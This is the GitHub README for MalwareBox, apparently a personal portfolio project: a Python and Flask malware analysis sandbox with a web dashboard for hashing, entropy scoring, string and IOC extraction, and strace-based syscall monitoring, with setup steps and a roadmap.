Skip to content

Lovedipsingh/Malwarebox

BranchesTags

Repository files navigation

πŸ›‘οΈ MalwareBox β€” Malware Analysis Sandbox

Python Flask License Platform

A Python-based malware analysis sandbox with a web dashboard for analysing suspicious files β€” without executing them. Built as a cybersecurity portfolio project.

MalwareBox Dashboard

✨ What It Does

Drop any suspicious file into the dashboard and MalwareBox will:

  • πŸ”‘ Hash it β€” MD5, SHA-1, SHA-256 fingerprints for VirusTotal lookups
  • 🌑️ Measure entropy β€” high entropy (>7.2) means the file may be packed or encrypted
  • πŸ” Extract strings β€” pulls readable text from binary files
  • 🚩 Find IOCs β€” hardcoded IPs, URLs, registry keys, base64 payloads
  • βš™οΈ Monitor behaviour β€” syscall tracing via strace (Linux)
  • πŸ“Š Score the risk β€” 0–100 risk score with detailed flags
  • πŸ’Ύ Save reports β€” JSON reports saved automatically for every scan

πŸ–₯️ Dashboard

The web UI lets you drag & drop any file and see results instantly:

Feature Description
Drag & drop upload Drop files directly onto the dashboard
Live progress bar Real-time analysis progress
Risk score display Colour-coded 0–100 risk rating
IOC panel All indicators of compromise in one view
Risk flags Plain-English explanation of every finding
Analysis history All previous scans saved and accessible

πŸš€ Quick Start

Requirements

  • Python 3.8+
  • Windows / Linux

Install & Run

# 1. Clone the repo
git clone https://github.com/Lovedipsingh/Malwarebox.git
cd Malwarebox

# 2. Install dependencies
pip install flask

# 3. Launch (Windows β€” just double-click)
launch.bat

# 3. Launch (Linux/Mac)
python app.py

Then open http://localhost:5000 in your browser.

πŸ“ Project Structure

Malwarebox/
β”œβ”€β”€ app.py                      # Flask web server & API
β”œβ”€β”€ launch.bat                  # Windows one-click launcher
β”œβ”€β”€ setup.bat                   # Windows first-time setup
β”œβ”€β”€ sandbox/
β”‚   β”œβ”€β”€ static_analyzer.py      # Core analysis engine
β”‚   β”œβ”€β”€ dynamic_monitor.py      # Runtime syscall tracing
β”‚   β”œβ”€β”€ network_capture.py      # Packet analysis
β”‚   └── report_generator.py     # JSON report output
└── templates/
    └── index.html              # Web dashboard UI

πŸ”¬ How The Analysis Works

Static Analysis (safe β€” no execution)

  1. Reads the raw file bytes
  2. Computes cryptographic hashes β†’ paste into VirusTotal
  3. Calculates Shannon entropy β†’ high values = likely encrypted/packed
  4. Extracts readable strings β†’ finds hidden commands and paths
  5. Pattern-matches IOCs β†’ IPs, URLs, registry keys, base64 blobs
  6. Scores risk 0–100 based on all findings

Dynamic Analysis (Linux only)

  1. Wraps the sample in strace
  2. Records every system call made during execution
  3. Flags dangerous calls: execve, connect, mprotect, ptrace
  4. Tracks child processes spawned by the sample
  5. Records all file system events

⚠️ Safety Notice

Always run this tool inside an isolated VM or container.
Never analyse real malware on your host machine.

πŸ—ΊοΈ Roadmap

  • VirusTotal API integration
  • YARA rule scanning
  • Docker container support
  • PDF report export
  • MITRE ATT&CK technique tagging

πŸ“„ License

MIT License β€” free to use and modify.

Built by Lovedip Singh

About

πŸ›‘οΈ A Python-based malware analysis sandbox with a web dashboard β€” static analysis, IOC detection, entropy scoring, and dynamic behaviour monitoring.

Topics

python flask static-analysis cybersecurity malware-analysis security-tools

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages